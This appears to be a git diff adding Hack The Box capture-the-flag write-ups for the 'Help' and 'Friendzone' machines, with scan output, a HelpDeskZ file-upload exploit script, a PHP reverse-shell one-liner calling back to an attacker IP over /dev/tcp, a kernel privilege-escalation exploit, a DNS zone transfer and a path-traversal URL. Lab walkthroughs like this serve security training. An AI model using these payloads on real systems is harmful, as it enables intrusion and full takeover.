+ | ssh-hostkey:
+ | 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
+ | 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
+ |_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Apache2 Ubuntu Default Page: It works
+ 3000/tcp open http Node.js Express framework
+ |_http-title: Site doesn't have a title (application/json; charset=utf-8).
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 19.83 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan seems to have picked up 2 interesting ports here : 80 and 3000. Let's run a dirsearch command on both these ports to enumerate what folders may be available for us to browse.
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → dirsearch -u http://10.10.10.121/ -e php -x 403 -r
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → dirsearch -u http://10.10.10.121:3000/ -e php -x 403 -r
+
+ Target: http://10.10.10.121:3000/
+
+ [20:04:07] Starting:
+ [20:04:21] 400 - 18B - /graphql
+ [20:04:21] 400 - 18B - /graphql/console/
+
+ Task Completed
+
+
+
+Looking at the results, we see that dirsearch wasn't able to find alot of folders for the 3000th port, however it was able to find much more for the 80th port.
+
+
+ [20:04:08] Starting:
+ [20:04:23] 200 - 11KB - /index.md
+ [20:04:23] 301 - 317B - /javascript -> http://10.10.10.121/javascript/
+ [20:04:31] 301 - 314B - /support -> http://10.10.10.121/support/
+ [20:04:34] Starting: javascript/
+ [20:05:00] Starting: support/
+ [20:05:00] 200 - 378B - /support/.gitattributes
+ [20:05:10] 301 - 318B - /support/css -> http://10.10.10.121/support/css/
+ [20:05:12] 200 - 1KB - /support/favicon.ico
+ [20:05:14] 301 - 321B - /support/images -> http://10.10.10.121/support/images/
+ [20:05:14] 301 - 323B - /support/includes -> http://10.10.10.121/support/includes/
+ [20:05:14] 302 - 0B - /support/includes/ -> /
+ [20:05:14] 200 - 4KB - /support/index.php/login/
+ [20:05:14] 200 - 4KB - /support/index.php
+ [20:05:15] 301 - 317B - /support/js -> http://10.10.10.121/support/js/
+ [20:05:15] 301 - 325B - /support/js/tinymce -> http://10.10.10.121/support/js/tinymce/
+ [20:05:15] 302 - 0B - /support/js/tinymce/ -> /
+ [20:05:15] 200 - 18KB - /support/LICENSE.txt
+ [20:05:20] 200 - 7KB - /support/readme.html
+ [20:05:20] 200 - 3KB - /support/README.md
+ [20:05:24] 301 - 322B - /support/uploads -> http://10.10.10.121/support/uploads/
+ [20:05:24] 302 - 0B - /support/uploads/ -> /
+ [20:05:25] Starting: css/
+ [20:05:50] Starting: images/
+ [20:06:15] Starting: includes/
+ [20:06:40] Starting: js/
+ [20:07:05] Starting: uploads/
+
+ Task Completed
+
+
+
+
+
+navigating to the 80th port's /support page, we are redirected to a helpdeskz webpage. Let's run a quick searchsploit command in order to get an idea of the exploits we could use for this webservice.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → searchsploit helpdeskz
+ ------------------------------------ ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ------------------------------------ ----------------------------------------
+ HelpDeskZ 1.0.2 - Arbitrary File Up | exploits/php/webapps/40300.py
+ HelpDeskZ < 1.0.2 - (Authenticated) | exploits/php/webapps/41200.py
+ ------------------------------------ ----------------------------------------
+ Shellcodes: No Result
+
+
+Looks like we may have a python script for us to use. Let's first locate where it is located in our system, and copy it to our current directory.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → locate 40300.py
+ /usr/share/exploitdb/exploits/php/webapps/40300.py
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → cp /usr/share/exploitdb/exploits/php/webapps/40300.py .
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → ls
+ 40300.py
+
+
+Looking at the github page for helpdeskz, especially the [php file](https://github.com/evolutionscript/HelpDeskZ-1.0/blob/master/controllers/submit_ticket_controller.php) that handles the ticket submissions, We see that the code seems to possess a few vulnerabilities.
+
+
+
+First of all, we see that the upload directory should end with tickets/
+
+Second, we see that the uploaded file gets appended a timestamp to it, and then gets hashed through the md5 algorithm.
+
+To find out about the time running onto the machine, we can simply use the curl command.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → curl -v http://10.10.10.121/support/
+ * Trying 10.10.10.121:80...
+ * TCP_NODELAY set
+ * Connected to 10.10.10.121 (10.10.10.121) port 80 (#0)
+ > GET /support/ HTTP/1.1
+ > Host: 10.10.10.121
+ > User-Agent: curl/7.67.0
+ > Accept: */*
+ >
+ * Mark bundle as not supporting multiuse
+ < HTTP/1.1 200 OK
+ < Date: Fri, 06 Dec 2019 19:35:42 GMT
+ < Server: Apache/2.4.18 (Ubuntu)
+ < Set-Cookie: PHPSESSID=e9fa26li4655k4nrm8pk3aa0g2; path=/
+ < Expires: Thu, 19 Nov 1981 08:52:00 GMT
+ < Cache-Control: no-store, no-cache, must-revalidate
+ < Pragma: no-cache
+ < Set-Cookie: lang=english; expires=Fri, 13-Dec-2019 19:35:42 GMT; Max-Age=604800
+ < Vary: Accept-Encoding
+ < Content-Length: 4453
+ < Content-Type: text/html; charset=UTF-8
+ <
+
+
+
+Since the people that wrote the script seem to have forgotten the parentheses to literally every single print statement, we'll finish their job using the CLI text editor called "nano"
+
+
+ import hashlib
+ import time
+ import sys
+ import requests
+
+ print('Helpdeskz v1.0.2 - Unauthenticated shell upload exploit')
+
+ if(len(sys.argv) < 3):
+ print("Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0]))
+ sys.exit(1)
+
+ helpdeskzBaseUrl = sys.argv[1]
+ fileName = sys.argv[2]
+
+ currentTime = int(time.time())
+
+ for x in range(300, 600):
+ plaintext = fileName + str(currentTime - x)
+ **plaintext = plaintext.encode('utf-8')**
+ md5hash = hashlib.md5(plaintext).hexdigest()
+
+ url = helpdeskzBaseUrl+md5hash+'.php'
+ response = requests.head(url)
+ if response.status_code == 200:
+ print("found!")
+ print(url)
+ sys.exit(0)
+
+ print("Sorry, I did not find anything")
+
+
+Do not forget to add the highlighted line of code
+
+let's not forget our reverse php shell one liner that we will save as nihilist.php
+
+
+ <****?php
+ echo("nihilist WAS HERE");
+ exec("/bin/bash -c 'bash -i > & /dev/tcp/10.10.14.48/9001 0>&1'");
+
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → nano nihilist.php
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → chmod 777 nihilist.php
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → ls -l
+ total 8
+ -rwxr-xr-x 1 nihilist users 690 Dec 6 20:50 40300.py
+ -rwxrwxrwx 1 nihilist users 99 Dec 6 20:51 nihilist.php
+
+
+Now before we upload our reverse shell nihilist.php onto through the helpdeskz ticket submission, and then try to browse to it using the correct python script, we ready our first terminal with the nc command to catch the incoming reverse shell connection onto our 9001st port, and we ready the python script inside the second terminal, because we do not want to waste much time, as the timestamp here is important for the exploit to be successful.
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → nc -lvnp 9001
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → python 40300.py http://10.10.10.121/support/uploads/tickets/ nihilist.php
+
+
+
+
+as we click submit, we run the python script right after , so that we make sure that our python script can find our timestamped md5 hashed shell.
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → nc -lvnp 9001
+ Connection from 10.10.10.121:58982
+ bash: cannot set terminal process group (809): Inappropriate ioctl for device
+ bash: no job control in this shell
+
+ help@help:/var/www/html/support/uploads/tickets$ ls
+ ls
+ 17045dc4fa593d3df5b756a6f58a5e4b.php
+ 2fd3b632dbedfa05adcf9ba1c7cdfef1.php
+ a963f7fea2767b2edcab7045b8be9deb.php
+ dbdb2a8bb1ec0bda7b527398d2427d60.php
+ index.php
+
+ help@help:/var/www/html/support/uploads/tickets$ cat /home/help/user.txt
+ cat /home/help/user.txt
+ bbXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it for the user part ! We have been able to login as the "help" user, and we now have it's user flag.
+
+## **Part 3 : Getting Root Access**
+
+Running a quick uname command with the -a flag we see that the box may be vulnerable to a kernel exploit.
+
+
+ help@help:/var/www/html/support/uploads/tickets$ uname -a
+ uname -a
+ Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+
+
+so let's see which exploit is available for this kernel version, using the searchsploit command.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → searchsploit linux 4.4.0-116
+ --------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ --------------------------------------------------------------------------- ----------------------------------------
+ Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | exploits/linux/local/44298.c
+ --------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+Seems like we will use the C exploit n°44298. Let's locate it and copy it onto our current directory.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → locate 44298.c
+ /home/nihilist/_HTB/Bashed/44298.c
+ /usr/share/exploitdb/exploits/linux/local/44298.c
+
+
+Fun Fact : we're going to privesc the exact same way as we did back on the [Bashed](15.html) machine.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → cp /usr/share/exploitdb/exploits/linux/local/44298.c .
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → ls
+ 40300.py 44298.c nihilist.php
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → gcc 44298.c -o nihilist.privesc
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → python -m SimpleHTTPServer 9999
+ /usr/bin/python: No module named SimpleHTTPServer
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Help ]
+ → python2 -m SimpleHTTPServer 9999
+ Serving HTTP on 0.0.0.0 port 9999 ...
+
+
+Once we compiled the exploit into the nihilist.privesc executable, we use python2's SimpleHTTPServer module on port 9999 to be able to upload the file onto the machine
+
+
+ help@help:/var/www/html/support/uploads/tickets$ which curl
+ which curl
+ help@help:/var/www/html/support/uploads/tickets$ which wget
+
+ which wget
+ /usr/bin/wget
+
+
+Seems like we won't be able to use curl to download the executable, but that's no problem, since wget is there to save us.
+
+
+ help@help:/var/www/html/support/uploads/tickets$ wget http://10.10.14.48:9999/nihilist.privesc
+ <****port/uploads/tickets$ wget http://10.10.14.48:9999/nihilist.privesc
+ --2019-12-06 12:28:38-- http://10.10.14.48:9999/nihilist.privesc
+ Connecting to 10.10.14.48:9999... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 17872 (17K) [application/octet-stream]
+ Saving to: 'nihilist.privesc'
+
+ 0K .......... ....... 100% 482K=0.04s
+
+ 2019-12-06 12:28:38 (482 KB/s) - 'nihilist.privesc' saved [17872/17872]
+
+ help@help:/var/www/html/support/uploads/tickets$ ls
+ ls
+ 17045dc4fa593d3df5b756a6f58a5e4b.php
+ 2fd3b632dbedfa05adcf9ba1c7cdfef1.php
+ a963f7fea2767b2edcab7045b8be9deb.php
+ dbdb2a8bb1ec0bda7b527398d2427d60.php
+ nihilist.privesc
+ index.php
+
+ help@help:/var/www/html/support/uploads/tickets$ ./nihilist.privesc
+ ./nihilist.privesc
+ bash: ./nihilist.privesc: Permission denied
+
+Let's not forget to change the executable's permissions to actually make it executable :
+
+
+ help@help:/var/www/html/support/uploads/tickets$ chmod +x nihilist.privesc
+ chmod +x nihilist.privesc
+
+ help@help:/var/www/html/support/uploads/tickets$ ./nihilist.privesc
+ ./nihilist.privesc
+
+ id
+ uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare),1000(help)
+
+ cat /root/root.txt
+ b7XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! We have been able to print the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
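Review bot: the script listings in this hunk are not fenced, so the markdown will not render them as code and a reader who copies them gets broken files: the line `**plaintext = plaintext.encode('utf-8')**` carries literal bold markers inside the Python source (the sentence "Do not forget to add the highlighted line of code" relies on highlighting that a code block cannot show; a comment such as `# added: encode before hashing` would survive copy-paste), and the PHP one-liner opens with `<****?php`, a corrupted `<?php` tag, with the same `<****` corruption reappearing in the wget echo line `<****port/uploads/tickets$`. Suggest wrapping each listing in a ```python / ```php / ```text fence and removing the stray asterisks. Two smaller points: `chmod 777 nihilist.php` is unnecessary for a file that is only submitted through a web form, and the "as we click submit" paragraph refers to a screenshot that is not embedded in this file, so the ticket-submission step is undocumented in the text.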
diff --git a/Easy/28.md b/Easy/28.md
new file mode 100644
index 0000000..da9d101
--- /dev/null
+++ b/Easy/28.md
@@ -0,0 +1,606 @@
+# Friendzone Writeup
+
+
+
+## Introduction :
+
+Friendzone is an easy Linux box released back in Febuary 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → nmap -F 10.10.10.123
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-07 09:04 CET
+ Nmap scan report for 10.10.10.123
+ Host is up (0.15s latency).
+ Not shown: 93 closed ports
+ PORT STATE SERVICE
+ 21/tcp open ftp
+ 22/tcp open ssh
+ 53/tcp open domain
+ 80/tcp open http
+ 139/tcp open netbios-ssn
+ 443/tcp open https
+ 445/tcp open microsoft-ds
+
+ Nmap done: 1 IP address (1 host up) scanned in 6.85 seconds
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → nmap -sC -sV 10.10.10.123 -p 21,22,53,80,139,443,445
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-07 09:05 CET
+ Nmap scan report for 10.10.10.123
+ Host is up (0.036s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp vsftpd 3.0.3
+ 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
+ | 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
+ |_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
+ 53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
+ | dns-nsid:
+ |_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
+ 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
+ |_http-server-header: Apache/2.4.29 (Ubuntu)
+ |_http-title: Friend Zone Escape software
+ 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
+ 443/tcp open ssl/http Apache httpd 2.4.29
+ |_http-server-header: Apache/2.4.29 (Ubuntu)
+ |_http-title: 404 Not Found
+ | ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
+ | Not valid before: 2018-10-05T21:02:30
+ |_Not valid after: 2018-11-04T21:02:30
+ |_ssl-date: TLS randomness does not represent time
+ | tls-alpn:
+ |_ http/1.1
+ 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
+ Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Host script results:
+ |_clock-skew: mean: -39m30s, deviation: 1h09m16s, median: 28s
+ |_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <****unknown>, NetBIOS MAC: <****unknown> (unknown)
+ | smb-os-discovery:
+ | OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
+ | Computer name: friendzone
+ | NetBIOS computer name: FRIENDZONE\x00
+ | Domain name: \x00
+ | FQDN: friendzone
+ |_ System time: 2019-12-07T10:06:20+02:00
+ | smb-security-mode:
+ | account_used: guest
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: disabled (dangerous, but default)
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2019-12-07T08:06:20
+ |_ start_date: N/A
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 28.42 seconds
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up the samba service running on both port 139 and 445. So we run the smb map command with it's -H flag in order to enumerate the shares we can work with.
+
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → smbmap -H 10.10.10.123 -p 445,139
+ /bin/smbmap:1036: SyntaxWarning: "is" with a literal. Did you mean "=="?
+ if len(sys.argv) is 1:
+ [+] Finding open SMB ports....
+ [!] Authentication error on 10.10.10.123
+
+
+Seems like smbmap has got some problems on archlabs, but no worries, enum4linux is there to the rescue.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → enum4linux 10.10.10.123
+ Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Dec 7 09:12:14 2019
+
+ ==========================
+ | Target Information |
+ ==========================
+ Target ........... 10.10.10.123
+ RID Range ........ 500-550,1000-1050
+ Username ......... ''
+ Password ......... ''
+ Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
+
+
+ ====================================================
+ | Enumerating Workgroup/Domain on 10.10.10.123 |
+ ====================================================
+ Can't load /etc/samba/smb.conf - run testparm to debug it
+ [+] Got domain/workgroup name: WORKGROUP
+
+ ============================================
+ | Nbtstat Information for 10.10.10.123 |
+ ============================================
+ Can't load /etc/samba/smb.conf - run testparm to debug it
+ Looking up status of 10.10.10.123
+ FRIENDZONE <****00> - B <****ACTIVE> Workstation Service
+ FRIENDZONE <****03> - B <****ACTIVE> Messenger Service
+ FRIENDZONE <****20> - B <****ACTIVE> File Server Service
+ ..__MSBROWSE__. <****01> - <****GROUP> B <****ACTIVE> Master Browser
+ WORKGROUP <****00> - <****GROUP> B <****ACTIVE> Domain/Workgroup Name
+ WORKGROUP <****1d> - B <****ACTIVE> Master Browser
+ WORKGROUP <****1e> - <****GROUP> B <****ACTIVE> Browser Service Elections
+
+ MAC Address = 00-00-00-00-00-00
+
+ =====================================
+ | Session Check on 10.10.10.123 |
+ =====================================
+ [+] Server 10.10.10.123 allows sessions using username '', password ''
+
+ ===========================================
+ | Getting domain SID for 10.10.10.123 |
+ ===========================================
+ Unable to initialize messaging context
+ rpcclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+ [+] Can't determine if host is part of domain or part of a workgroup
+
+ ======================================
+ | OS information on 10.10.10.123 |
+ ======================================
+ Use of uninitialized value $os_info in concatenation (.) or string at /usr/bin/enum4linux line 464.
+ [+] Got OS info for 10.10.10.123 from smbclient:
+ [+] Got OS info for 10.10.10.123 from srvinfo:
+ Unable to initialize messaging context
+ rpcclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+
+ =============================
+ | Users on 10.10.10.123 |
+ =============================
+ Use of uninitialized value $users in print at /usr/bin/enum4linux line 874.
+ Use of uninitialized value $users in pattern match (m//) at /usr/bin/enum4linux line 877.
+
+ Use of uninitialized value $users in print at /usr/bin/enum4linux line 888.
+ Use of uninitialized value $users in pattern match (m//) at /usr/bin/enum4linux line 890.**=========================================
+ | Share Enumeration on 10.10.10.123 |
+ =========================================
+ Unable to initialize messaging context
+ smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+
+ Sharename Type Comment
+ --------- ---- -------
+ print$ Disk Printer Drivers
+ Files Disk FriendZone Samba Server Files /etc/Files
+ general Disk FriendZone Samba Server Files
+ Development Disk FriendZone Samba Server Files
+ IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
+ Reconnecting with SMB1 for workgroup listing.
+
+ Server Comment
+ --------- -------
+
+ Workgroup Master
+ --------- -------
+ WORKGROUP FRIENDZONE
+
+ [+] Attempting to map shares on 10.10.10.123
+ //10.10.10.123/print$ Mapping: DENIED, Listing: N/A
+ //10.10.10.123/Files Mapping: DENIED, Listing: N/A
+ //10.10.10.123/general Mapping: OK, Listing: OK
+ //10.10.10.123/Development Mapping: OK, Listing: OK
+ //10.10.10.123/IPC$ [E] Can't understand response:
+ Unable to initialize messaging context
+ smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+ NT_STATUS_OBJECT_NAME_NOT_FOUND listing \***
+ ====================================================
+ | Password Policy Information for 10.10.10.123 |
+ ====================================================
+ [E] Unexpected error from polenum:
+ Traceback (most recent call last):
+ File "/usr/bin/polenum", line 16, in <****module>
+ from impacket.dcerpc.v5.rpcrt import DCERPC_v5
+ ImportError: No module named impacket.dcerpc.v5.rpcrt
+ [+] Retieved partial password policy with rpcclient:
+
+
+
+ ==============================
+ | Groups on 10.10.10.123 |
+ ==============================
+
+ [+] Getting builtin groups:
+
+ [+] Getting builtin group memberships:
+
+ [+] Getting local groups:
+
+ [+] Getting local group memberships:
+
+ [+] Getting domain groups:
+
+ [+] Getting domain group memberships:
+
+ =======================================================================
+ | Users on 10.10.10.123 via RID cycling (RIDS: 500-550,1000-1050) |
+ =======================================================================
+
+ =============================================
+ | Getting printer info for 10.10.10.123 |
+ =============================================
+ Unable to initialize messaging context
+ rpcclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+
+
+ enum4linux complete on Sat Dec 7 09:12:20 2019
+
+Looking at the results, we have a few ports to work with. Let's check out the shares available for us using the smbclient command.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → smbclient \\\\10.10.10.123\\general
+ Unable to initialize messaging context
+ smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+ Enter WORKGROUP\nihilist's password:
+ Try "help" to get a list of possible commands.
+ smb: \> ls
+ . D 0 Wed Jan 16 21:10:51 2019
+ .. D 0 Wed Jan 23 22:51:02 2019
+ creds.txt N 57 Wed Oct 10 01:52:42 2018
+
+ 9221460 blocks of size 1024. 6459232 blocks available
+ smb: \> get creds.txt
+ getting file \creds.txt of size 57 as creds.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
+ smb: \> exit
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → mv creds.txt Friendzone/creds.txt
+ mv: cannot move 'creds.txt' to 'Friendzone/creds.txt': No such file or directory
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → mkdir Friendzone
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → mv creds.txt Friendzone/creds.txt
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → cd Friendzone
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Friendzone ]
+ → cat creds.txt
+ creds for the admin THING:
+
+ admin:WORKWORKHhallelujah@#
+
+
+We seem to have a password to work with ! WORKWORKHhallelujah@# Now let's use nmap's smb share enumeration script.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Friendzone ]
+ → nmap 10.10.10.123 --script smb-enum-shares
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-07 09:39 CET
+ Nmap scan report for 10.10.10.123
+ Host is up (0.043s latency).
+ Not shown: 993 closed ports
+ PORT STATE SERVICE
+ 21/tcp open ftp
+ 22/tcp open ssh
+ 53/tcp open domain
+ 80/tcp open http
+ 139/tcp open netbios-ssn
+ 443/tcp open https
+ 445/tcp open microsoft-ds
+
+ Host script results:
+ | smb-enum-shares:
+ | account_used: guest
+ | \\10.10.10.123\Development:
+ | Type: STYPE_DISKTREE
+ | Comment: FriendZone Samba Server Files
+ | Users: 0
+ | Max Users: <****unlimited>
+ | Path: C:\etc\Development
+ | Anonymous access: READ/WRITE
+ | Current user access: READ/WRITE
+ | \\10.10.10.123\Files:
+ | Type: STYPE_DISKTREE
+ | Comment: FriendZone Samba Server Files /etc/Files
+ | Users: 0
+ | Max Users: <****unlimited>
+ | Path: C:\etc\hole
+ | Anonymous access: <****none>
+ | Current user access: <****none>
+ | \\10.10.10.123\IPC$:
+ | Type: STYPE_IPC_HIDDEN
+ | Comment: IPC Service (FriendZone server (Samba, Ubuntu))
+ | Users: 1
+ | Max Users: <****unlimited>
+ | Path: C:\tmp
+ | Anonymous access: READ/WRITE
+ | Current user access: READ/WRITE
+ | \\10.10.10.123\general:
+ | Type: STYPE_DISKTREE
+ | Comment: FriendZone Samba Server Files
+ | Users: 0
+ | Max Users: <****unlimited>
+ | Path: C:\etc\general
+ | Anonymous access: READ/WRITE
+ | Current user access: READ/WRITE
+ | \\10.10.10.123\print$:
+ | Type: STYPE_DISKTREE
+ | Comment: Printer Drivers
+ | Users: 0
+ | Max Users: <****unlimited>
+ | Path: C:\var\lib\samba\printers
+ | Anonymous access: <****none>
+ |_ Current user access: <****none>
+
+ Nmap done: 1 IP address (1 host up) scanned in 10.82 seconds
+
+Browsing to the 80th port, we are greeted with a simple html page with a picture. Although we are hinted towards domain name resolution at the bottom, so let's see what lies at the https port in order to see if we can enumerate the DNS part of this box a little further using the SSL certificate.
+
+  
+
+Seems like we have a hostname to work with : friendzone.red let's do a quick dns lookup using the dig command.
+
+
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → pacman -S blackarch/python2-dnsknife
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → dig axfr @10.10.10.123 friendzone.red
+
+ ; <<>> DiG 9.14.8 <<>> axfr @10.10.10.123 friendzone.red
+ ; (1 server found)
+ ;; global options: +cmd
+ friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
+ friendzone.red. 604800 IN AAAA ::1
+ friendzone.red. 604800 IN NS localhost.
+ friendzone.red. 604800 IN A 127.0.0.1
+ administrator1.friendzone.red. 604800 IN A 127.0.0.1
+ hr.friendzone.red. 604800 IN A 127.0.0.1
+ uploads.friendzone.red. 604800 IN A 127.0.0.1
+ friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
+ ;; Query time: 39 msec
+ ;; SERVER: 10.10.10.123#53(10.10.10.123)
+ ;; WHEN: Sat Dec 07 10:13:25 CET 2019
+ ;; XFR size: 8 records (messages 1, bytes 289)
+
+
+Looking at the results, we seem to have found administrator1.friendzone.red and uploads.friendzone.red . Since HackTheBox doesn't do DNS we'll add the following line into our /etc/hosts file :
+
+
+ 10.10.10.123 administrator1.friendzone.red uploads.friendzone.red
+
+
+Browsing to the administrator1.friendzone.red URI we are greeted by a login prompt.
+
+
+
+Using the credentials we found earlier, we are able to login :
+
+
+
+Earlier our enum4linux scan picked up the Development SMB Share :
+
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → smbclient -H //10.10.10.123/Development
+ Unable to initialize messaging context
+ smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+ Enter WORKGROUP\nihilist's password:
+ Try "help" to get a list of possible commands.
+ smb: \> ls
+ . D 0 Sat Dec 7 09:40:17 2019
+ .. D 0 Wed Jan 23 22:51:02 2019
+
+
+This is where we will upload our reverse php shell, just pick up a quick oneliner for us to use and upload it :
+
+
+ <****?php
+ echo("nihilist WAS HERE");
+ exec("/bin/bash -c 'bash -i > & /dev/tcp/10.10.14.48/9001 0>&1'");
+
+
+
+ smb: \> put nihilist_rev.php
+ putting file nihilist_rev.php as \nihilist_rev.php (0.9 kb/s) (average 0.9 kb/s)
+ smb: \> ls
+ . D 0 Sat Dec 7 10:38:01 2019
+ .. D 0 Wed Jan 23 22:51:02 2019
+ nihilist_rev.php A 101 Sat Dec 7 10:38:02 2019
+
+ 9221460 blocks of size 1024. 6460304 blocks available
+
+ smb: \> exit
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → nc -lvnp 9001
+
+
+Once the reverse shell is uploaded, we ready our terminal with the nc command in order to catch the incoming reverse shell connection onto our 9001st port. Then we browse to our reverse php shell from within the webbrowser and see the result :
+
+
+ https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename;=../../../../../../../../../etc/Development/nihilist_rev.php
+
+
+This does not work because the URI must not end with .php ! So you need to browse to this URI :
+
+
+ https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename;=../../../../../../../../../etc/Development/nihilist_rev
+
+
+And see that our terminal catched the reverse shell connection.
+
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → nc -lvnp 9001
+ Connection from 10.10.10.123:58526
+ bash: cannot set terminal process group (556): Inappropriate ioctl for device
+ bash: no job control in this shell
+
+ www-data@FriendZone:/var/www/admin$ uname -a
